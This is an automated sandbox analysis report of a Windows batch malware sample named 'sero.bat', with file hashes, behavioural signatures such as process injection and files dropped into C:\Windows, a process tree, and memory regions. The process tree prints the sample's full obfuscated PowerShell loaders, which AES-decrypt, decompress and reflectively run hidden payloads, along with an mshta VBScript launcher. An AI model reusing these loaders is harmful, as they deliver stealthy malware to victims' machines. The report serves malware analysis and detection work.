Analysis
-
max time kernel
26s -
max time network
18s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
02-10-2023 21:46
Static task
static1
Behavioral task
behavioral1
Sample
sero.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
sero.bat
Resource
win10v2004-20230915-en
General
-
Target
sero.bat
-
Size
12.4MB
-
MD5
46392f93dbe11365dcc6057a0e0c3c6f
-
SHA1
f5e14d896d366a2d0c856aebff5ec1c7e9f5197e
-
SHA256
4c6e90e178396d000b5dd5c5bb2b9ae5bbbca5986f26ffad2a6bd0845b6b2c83
-
SHA512
148f834fa1bed7acb833ad90c2e1782ac4af06a386ed45e95c0dae3b69cd6950330e9827f188a9cf71150db732737751f979d29814e0dde69e1d48dbb283cff3
-
SSDEEP
49152:UibWQBcVln6vHr2y7++rl77xFiIf5n/IXNgbNTcw3fbRGI6U1MaRaLkFXhzhLBxV:V
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
sero.bat.exedescription pid process target process PID 3404 created 624 3404 sero.bat.exe winlogon.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 2 IoCs
Processes:
sero.bat.exe$sxr-mshta.exepid process 3404 sero.bat.exe 1856 $sxr-mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
sero.bat.exedescription pid process target process PID 3404 set thread context of 4456 3404 sero.bat.exe dllhost.exe PID 3404 set thread context of 2916 3404 sero.bat.exe dllhost.exe -
Drops file in Windows directory 6 IoCs
Processes:
sero.bat.exedescription ioc process File opened for modification C:\Windows\$sxr-mshta.exe sero.bat.exe File created C:\Windows\$sxr-cmd.exe sero.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe sero.bat.exe File created C:\Windows\$sxr-powershell.exe sero.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe sero.bat.exe File created C:\Windows\$sxr-mshta.exe sero.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
$sxr-mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
sero.bat.exedllhost.exedllhost.exepid process 3404 sero.bat.exe 3404 sero.bat.exe 3404 sero.bat.exe 4456 dllhost.exe 4456 dllhost.exe 4456 dllhost.exe 4456 dllhost.exe 2916 dllhost.exe 2916 dllhost.exe 2916 dllhost.exe 2916 dllhost.exe 3404 sero.bat.exe 3404 sero.bat.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
sero.bat.exedllhost.exedllhost.exedescription pid process Token: SeDebugPrivilege 3404 sero.bat.exe Token: SeDebugPrivilege 3404 sero.bat.exe Token: SeDebugPrivilege 4456 dllhost.exe Token: SeDebugPrivilege 2916 dllhost.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
cmd.exesero.bat.exedescription pid process target process PID 2416 wrote to memory of 3404 2416 cmd.exe sero.bat.exe PID 2416 wrote to memory of 3404 2416 cmd.exe sero.bat.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 4456 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe PID 3404 wrote to memory of 2916 3404 sero.bat.exe dllhost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{370b7419-547b-4245-958d-6955e81d6447}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sero.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\sero.bat.exe"sero.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function OhDeL($VLnrL){ $aXSjO=[System.Security.Cryptography.Aes]::Create(); $aXSjO.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aXSjO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aXSjO.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iwu12OK8WWyxy2/r/fXOnqtAhiQmstP+JhEXQCQfqPI='); $aXSjO.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mijonkYYEu0J8yLQDV5vNg=='); $YWePC=$aXSjO.CreateDecryptor(); $return_var=$YWePC.TransformFinalBlock($VLnrL, 0, $VLnrL.Length); $YWePC.Dispose(); $aXSjO.Dispose(); $return_var;}function hzpfu($VLnrL){ $cxxQm=New-Object System.IO.MemoryStream(,$VLnrL); $YnLaf=New-Object System.IO.MemoryStream; $fTxDe=New-Object System.IO.Compression.GZipStream($cxxQm, [IO.Compression.CompressionMode]::Decompress); $fTxDe.CopyTo($YnLaf); $fTxDe.Dispose(); $cxxQm.Dispose(); $YnLaf.Dispose(); $YnLaf.ToArray();}function kTEJI($VLnrL,$DRTbt){ $tNdAg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$VLnrL); $Ujdld=$tNdAg.EntryPoint; $Ujdld.Invoke($null, $DRTbt);}$TExfK=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sero.bat').Split([Environment]::NewLine);foreach ($QLAsh in $TExfK) { if ($QLAsh.StartsWith('SEROXEN')) { $zWJDv=$QLAsh.Substring(7); break; }}$StmMq=[string[]]$zWJDv.Split('\');$mZupC=hzpfu (OhDeL ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($StmMq[0])));$nZwkL=hzpfu (OhDeL ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($StmMq[1])));kTEJI $nZwkL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));kTEJI $mZupC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{58bbb5f1-e234-4b43-a7d1-b050440794f3}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-ArapbJcqiFeDiSwKsZvE4312:&#<?=%2⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function WDqsH($QqiMQ){ $yfdMg=[System.Security.Cryptography.Aes]::Create(); $yfdMg.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yfdMg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yfdMg.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo='); $yfdMg.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA=='); $dPssD=$yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')(); $vbpQn=$dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QqiMQ, 0, $QqiMQ.Length); $dPssD.Dispose(); $yfdMg.Dispose(); $vbpQn;}function ZbSkn($QqiMQ){ $aDlrM=New-Object System.IO.MemoryStream(,$QqiMQ); $PbRBT=New-Object System.IO.MemoryStream; $VprFY=New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::Decompress); $VprFY.CopyTo($PbRBT); $VprFY.Dispose(); $aDlrM.Dispose(); $PbRBT.Dispose(); $PbRBT.ToArray();}function cEHWM($QqiMQ,$bbJgy){ $TxSfZ=[System.Reflection.Assembly]::Load([byte[]]$QqiMQ); $tpznJ=$TxSfZ.EntryPoint; $tpznJ.Invoke($null, $bbJgy);}$yfdMg1 = New-Object System.Security.Cryptography.AesManaged;$yfdMg1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$KRTqO = $yfdMg1.('rotpyrceDetaerC'[-1..-15] -join '')();$gcGOE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8n1l73NGddDdRxG42gPYiw==');$gcGOE = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE, 0, $gcGOE.Length);$gcGOE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE);$QRPDA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yGpDNlon+IGNZlDoKYh/CEYBRa4S+ZHu1B70zY9cwMA=');$QRPDA = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QRPDA, 0, $QRPDA.Length);$QRPDA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QRPDA);$GaeUG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rpm81cgQxWQeYHUZpMovqQ==');$GaeUG = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GaeUG, 0, $GaeUG.Length);$GaeUG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GaeUG);$eseMN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hUoupuHhMa4na+h2TJI0Er5Gc4kqi6sGr00/HWtfX8Be1iAlyWhtr/ObmiCu6xI5SnMUqTV6m6bwoUtMbLUtY10c8YBf6pNVSdWrzHM4pnXNzXKQ87RW7mPAAwKaunGhKVxZKkEG4xYtm99CWXDIEmqWLBWq+pXwJC9cihgZsZkfFDYobfwN0Z5xtciUZAwuyvzH60/cONCUWKrAzdP6Onkqh+zZZK2FHEPUbSyu/LnfAb4uax7uoqmEtzxZ/fW119dEan1fjkFCR79zzFDcZVYQUKiWqQqS2Ek/7qCwsuj3v515pNkWTi4TffhMgdakq6i1ZmYILogATm9MnWpE9PRpN1macB6SNTSAyN5cdpPNIn2ozbUfCnuzoDIEKsfOzpur/w7fB8G8GTAYZOwnVbj47WQDJKZeRt9vo9KqwIQ=');$eseMN = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eseMN, 0, $eseMN.Length);$eseMN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eseMN);$FuEBF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g6uAMApUxkExGGhM4FN3ZQ==');$FuEBF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FuEBF, 0, $FuEBF.Length);$FuEBF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FuEBF);$YsLLR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DLgOUFYtRlYOUrIuUaKKdg==');$YsLLR = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YsLLR, 0, $YsLLR.Length);$YsLLR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YsLLR);$twswF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('izHZIeNsTWReQRqAPbaMbA==');$twswF = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($twswF, 0, $twswF.Length);$twswF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($twswF);$tuAlw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GX+xpROJQFGoaxfmnJNXow==');$tuAlw = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tuAlw, 0, $tuAlw.Length);$tuAlw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tuAlw);$ZBFmj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVLeF6i1oCz901n7Ky8b2g==');$ZBFmj = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZBFmj, 0, $ZBFmj.Length);$ZBFmj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZBFmj);$gcGOE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F3VH0Tp8k7zoccwaIE4hKQ==');$gcGOE0 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE0, 0, $gcGOE0.Length);$gcGOE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE0);$gcGOE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rF9tWOqGvlln0DPgm6Kvyg==');$gcGOE1 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE1, 0, $gcGOE1.Length);$gcGOE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE1);$gcGOE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a0pcGJ1ctfG5WTMhMOT9Zw==');$gcGOE2 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE2, 0, $gcGOE2.Length);$gcGOE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE2);$gcGOE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ndk0pwdH94NwFQHMwCgBcA==');$gcGOE3 = $KRTqO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gcGOE3, 0, $gcGOE3.Length);$gcGOE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gcGOE3);$KRTqO.Dispose();$yfdMg1.Dispose();if (@(get-process -ea silentlycontinue $gcGOE3).count -gt 1) {exit};$SKaRD = [Microsoft.Win32.Registry]::$tuAlw.$twswF($gcGOE).$YsLLR($QRPDA);$lHaHc=[string[]]$SKaRD.Split('\');$gHUaE=ZbSkn(WDqsH([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[1])));cEHWM $gHUaE (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$wJhoA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($lHaHc[0]);$yfdMg = New-Object System.Security.Cryptography.AesManaged;$yfdMg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$yfdMg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$yfdMg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9mQOFJphRVclvGMalqXgUPD/WUaQ9rWRelHL4q/nlo=');$yfdMg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4IOG3S4On+LTwmQKwhpOeA==');$dPssD = $yfdMg.('rotpyrceDetaerC'[-1..-15] -join '')();$wJhoA = $dPssD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJhoA, 0, $wJhoA.Length);$dPssD.Dispose();$yfdMg.Dispose();$aDlrM = New-Object System.IO.MemoryStream(, $wJhoA);$PbRBT = New-Object System.IO.MemoryStream;$VprFY = New-Object System.IO.Compression.GZipStream($aDlrM, [IO.Compression.CompressionMode]::$gcGOE1);$VprFY.$ZBFmj($PbRBT);$VprFY.Dispose();$aDlrM.Dispose();$PbRBT.Dispose();$wJhoA = $PbRBT.ToArray();$mLeMR = $eseMN | IEX;$TxSfZ = $mLeMR::$gcGOE2($wJhoA);$tpznJ = $TxSfZ.EntryPoint;$tpznJ.$gcGOE0($null, (, [string[]] ($GaeUG)))3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ap21aa3.t2l.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\sero.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\sero.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
C:\Windows\$sxr-powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\$sxr-powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/1752-50-0x00007FFB25D80000-0x00007FFB26841000-memory.dmpFilesize
10.8MB
-
memory/2916-36-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/2916-34-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/3404-18-0x0000017380000000-0x0000017380024000-memory.dmpFilesize
144KB
-
memory/3404-22-0x0000017380320000-0x0000017380D6E000-memory.dmpFilesize
10.3MB
-
memory/3404-25-0x0000017380E20000-0x0000017380E76000-memory.dmpFilesize
344KB
-
memory/3404-26-0x0000017380E80000-0x0000017380ED8000-memory.dmpFilesize
352KB
-
memory/3404-27-0x0000017380EE0000-0x0000017380F02000-memory.dmpFilesize
136KB
-
memory/3404-28-0x00007FFB44EF0000-0x00007FFB450E5000-memory.dmpFilesize
2.0MB
-
memory/3404-30-0x00000173811C0000-0x00000173811CA000-memory.dmpFilesize
40KB
-
memory/3404-4-0x00000173C15E0000-0x00000173C1602000-memory.dmpFilesize
136KB
-
memory/3404-14-0x00007FFB25D80000-0x00007FFB26841000-memory.dmpFilesize
10.8MB
-
memory/3404-24-0x0000017380D70000-0x0000017380E14000-memory.dmpFilesize
656KB
-
memory/3404-21-0x00000173D9780000-0x00000173D9790000-memory.dmpFilesize
64KB
-
memory/3404-20-0x00007FFB44500000-0x00007FFB445BE000-memory.dmpFilesize
760KB
-
memory/3404-19-0x00007FFB44EF0000-0x00007FFB450E5000-memory.dmpFilesize
2.0MB
-
memory/3404-17-0x00007FFB25D80000-0x00007FFB26841000-memory.dmpFilesize
10.8MB
-
memory/3404-16-0x00000173D9780000-0x00000173D9790000-memory.dmpFilesize
64KB
-
memory/3404-15-0x00000173D9780000-0x00000173D9790000-memory.dmpFilesize
64KB
-
memory/4456-33-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/4456-31-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB